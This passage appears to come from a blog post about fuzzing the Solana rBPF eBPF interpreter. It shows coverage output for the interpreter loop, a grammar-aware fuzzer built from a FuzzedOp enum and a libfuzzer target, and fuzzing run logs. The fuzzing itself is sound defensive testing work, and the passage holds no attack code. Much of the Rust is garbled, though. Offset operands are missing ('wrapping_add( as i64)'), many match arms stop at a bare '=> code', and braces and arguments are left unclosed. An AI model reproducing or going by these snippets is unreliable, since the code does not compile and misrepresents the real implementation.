  767|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
  772|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
  777|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
  782|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      7|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
  787|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      0|                ebpf::LD_DW_IMM  => {
  796|      0|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      0|                    instruction_width = 2;
  798|      0|                    next_pc += 1;
  799|      0|                    reg[dst] = insn.imm as u64;
  800|      0|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     18|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  805|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
  806|      2|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|     18|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  810|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
  811|      6|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|    365|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  815|    365|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
  816|    348|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|     15|                    let vm_addr = (reg[src] as i64).wrapping_add( as i64) as u64;
  820|     15|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
  821|      5|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|     26|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  827|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
  828|     20|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     23|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  832|     23|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
  833|     13|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|     12|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  837|     12|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
  838|      5|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  842|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  849|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
  850|      3|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|     13|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  854|     13|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|     19|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  859|     19|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
  860|      7|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( as i64) as u64;
  864|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|  1.06k|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|    695|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|    710|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|    345|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|  1.03k|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|  2.07k|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|  1.03k|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|    346|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|    346|                    }
  886|    346|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|     13|                    if reg[src] as i32 == 0 {
  890|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|     11|                    }
  892|     11|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|     11|                    }
  895|     11|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    346|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|    351|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|    345|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|  1.03k|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      0|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|    369|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      0|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|    346|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|    690|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|    347|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|      4|                    if reg[src] as u32 == 0 {
  909|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|      2|                    }
  911|      2|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|  1.04k|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|  2.74k|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|    349|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|  1.03k|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|      0|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|      2|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      0|                ebpf::LE         => {
  920|      0|                    reg[dst] = match insn.imm {
  921|      0|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      0|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      0|                ebpf::BE         => {
  930|      0|                    reg[dst] = match insn.imm {
  931|      0|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      0|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|    402|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|    351|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|  1.12k|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|    721|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|  3.06k|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|  1.71k|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|  1.39k|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|     23|                    if reg[src] == 0 {
  950|     12|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|     11|                    }
  952|     11|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|  1.40k|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|  1.40k|                    }
  958|  1.40k|
  959|  1.40k|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|     12|                    if reg[src] == 0 {
  963|      5|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      7|                    }
  965|      7|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      7|                    }
  968|      7|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    838|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|  1.37k|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|  2.14k|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|  4.47k|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|      0|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|  1.73k|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      0|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|  1.03k|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|  5.59k|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|  2.85k|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|      3|                    if reg[src] == 0 {
  982|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|      1|                    }
  984|      1|                                    reg[dst] %= reg[src];
  985|       |                },
  986|  2.28k|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|  1.41k|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|    383|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|  4.24k|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|      0|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    357|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|  4.43k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + as isize) as usize; },
  995|     10|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
  996|  1.36k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.36k                                                        ^2
  997|  4.16k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.42k                                                        ^2.74k
  998|  1.73k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.39k                                                        ^343
  999|    343|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
 1000|  2.04k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.70k                                                        ^342
 1001|  2.04k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^2.04k                                                        ^1
 1002|    342|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
 1003|  1.02k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
 1004|  2.38k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^2.38k                                                        ^1
 1005|  1.76k|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.42k                                                        ^347
 1006|    686|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + as isize) as usize; },
 1007|  6.48k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + as isize) as usize; },
 1008|  2.44k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.40k                                                        ^1.03k
 1009|  18.1k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^17.7k                                                        ^363
 1010|  2.08k|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^2.07k                                                        ^12
 1011|  14.3k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^12.9k                                                        ^1.37k
 1012|  3.45k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^3.44k                                                        ^12
 1013|  1.36k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^1.02k                                                        ^346
 1014|      2|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + as isize) as usize; },
 1015|  2.05k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^2.04k                                                        ^14
 1016|  6.83k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + as isize) as usize; },
                                                                                           ^6.83k                                                        ^7
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     22|                    let mut resolved = false;
 1032|     22|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     22|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     22|                    if syscalls {
 1039|      2|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      2|                        }
 1062|     20|                    }
 1063|       |
 1064|     22|                    if calls {
 1065|     20|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     20|                        }
 1073|      2|                    }
 1074|       |
 1075|     22|                    if !resolved {
 1076|     22|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     16|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     14|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     14|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|   135k|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|    130|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|   135k|            }
 1106|       |        }
 1107|       |
 1108|    419|        Err(EbpfError::ExecutionOverrun(
 1109|    419|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    419|        ))
 1111|    763|    }

Unfortunately, this fuzzer doesn’t seem to achieve the coverage we expect. Several instructions are missed (note the 0 coverage on some branches of the match) and there are no jumps, calls, or other control-flow-relevant instructions. This is largely because throwing random bytes at any parser just isn’t going to be effective; most things will get caught at the verification stage, and very little will actually test the program.

We must improve this before we continue or we’ll be waiting forever for our fuzzer to find useful bugs.

At this point, we’re about two hours into development.

The smart fuzzer

eBPF is a quite simple instruction set; you can read the whole definition in just a few pages. Knowing this: why don’t we constrain our input to just these instructions? This approach is commonly called “grammar-aware” fuzzing on account of the fact that the inputs are constrained to some grammar. It is very powerful as a concept, and is used to test a variety of large targets which have strict parsing rules.

To create this grammar-aware fuzzer, I inspected the helpfully-named and provided which would allow me to create instructions. Now, all I needed to do was represent all the different instructions. By cross referencing with eBPF documentation, we can represent each possible operation in a single enum. You can see the whole in the rBPF repo if you wish, but the two most relevant sections are provided below.

Defining the enum that represents all instructions
#[derive(arbitrary::Arbitrary, Debug, Eq, PartialEq)]
pub enum FuzzedOp {
    JumpC(Cond, Source),
Translating FuzzedOps to BpfCode
pub type FuzzProgram = Vec<FuzzedInstruction>;

pub fn make_program(prog: &FuzzProgram, arch: Arch) -> BpfCode {
    let mut code = BpfCode::default();
    for inst in prog {
        match inst.op {
            FuzzedOp::Add(src) => code
                .add(src, arch)
            FuzzedOp::Sub(src) => code
                .sub(src, arch)
            FuzzedOp::Mul(src) => code
                .mul(src, arch)
            FuzzedOp::Div(src) => code
                .div(src, arch)
            FuzzedOp::BitOr(src) => code
                .bit_or(src, arch)
            FuzzedOp::BitAnd(src) => code
                .bit_and(src, arch)
            FuzzedOp::LeftShift(src) => code
                .left_shift(src, arch)
            FuzzedOp::RightShift(src) => code
                .right_shift(src, arch)
            FuzzedOp::Negate => code
            FuzzedOp::Modulo(src) => code
                .modulo(src, arch)
            FuzzedOp::BitXor(src) => code
                .bit_xor(src, arch)
            FuzzedOp::Mov(src) => code
                .mov(src, arch)
            FuzzedOp::SRS(src) => code
                .signed_right_shift(src, arch)
            FuzzedOp::SwapBytes(endian) => code
            FuzzedOp::Load(mem) => code
            FuzzedOp::LoadAbs(mem) => code
            FuzzedOp::LoadInd(mem) => code
            FuzzedOp::LoadX(mem) => code
            FuzzedOp::Store(mem) => code
            FuzzedOp::StoreX(mem) => code
            FuzzedOp::Jump => code
            FuzzedOp::JumpC(cond, src) => code
                .jump_conditional(cond, src)
            FuzzedOp::Call => code
            FuzzedOp::Exit => code

You’ll see here that our generation doesn’t really care to ensure that instructions are valid, just that they’re in the right format. For example, we don’t verify registers, addresses, jump targets, etc.; we just slap it together and see if it works. This is to prevent over-specialisation, where our attempts to fuzz things only make “boring” inputs that don’t test cases that would normally be considered invalid.

Okay – let’s make a fuzzer with this. The only real difference here is that our input format is now changed to have our new FuzzProgram type instead of raw bytes:

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
The whole fuzzer, though really it's not that different

This fuzzer expresses a particular stage in development. The differential fuzzer is significantly different in a few key aspects that will be discussed later.


use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, IntoBytes},
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,

fuzz_target!(|data: FuzzData| {
    let prog = make_program(&data.prog, data.arch);
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
    let mem_region = MemoryRegion::new_writable(&mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

        &mut TestInstructionMeter { remaining: 1 << 16 },


Let’s see how well this version covers our target now.

$ cargo +nightly fuzz run smart -- -max_total_time=60
... snip ...
#1449846	REDUCE cov: 1730 ft: 6369 corp: 1019/168Kb lim: 4096 exec/s: 4832 rss: 358Mb L: 267/2963 MS: 1 EraseBytes-
#1450798	NEW    cov: 1730 ft: 6370 corp: 1020/168Kb lim: 4096 exec/s: 4835 rss: 358Mb L: 193/2963 MS: 2 InsertByte-InsertRepeatedBytes-
#1451609	NEW    cov: 1730 ft: 6371 corp: 1021/168Kb lim: 4096 exec/s: 4838 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452095	NEW    cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4840 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452830	DONE   cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4826 rss: 358Mb
Done 1452830 runs in 301 second(s)

Notice that our number of inputs tried (the number farthest left) is nearly half, but our cov and ft values are significantly higher.

Let’s evaluate that coverage a little more specifically:

$ cargo +nightly fuzz coverage smart
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/smart -instr-profile=fuzz/coverage/smart/coverage.profdata -show-line-counts-or-regions -show-instantiations -name=execute_program_interpreted_inner
Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    886|    fn execute_program_interpreted_inner(
  710|    886|        &mut self,
  711|    886|        instruction_meter: &mut I,
  712|    886|        initial_insn_count: u64,
  713|    886|        last_insn_count: &mut u64,
  714|    886|    ) -> ProgramResult<E> {
  715|    886|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    886|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    886|        reg[1] = ebpf::MM_INPUT_START;
  718|    886|
  719|    886|        // Loop on instructions
  720|    886|        let config = self.executable.get_config();
  721|    886|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
  722|    886|        let mut remaining_insn_count = initial_insn_count;
  723|  2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|  2.16M|            *last_insn_count += 1;
  725|  2.16M|            let pc = next_pc;
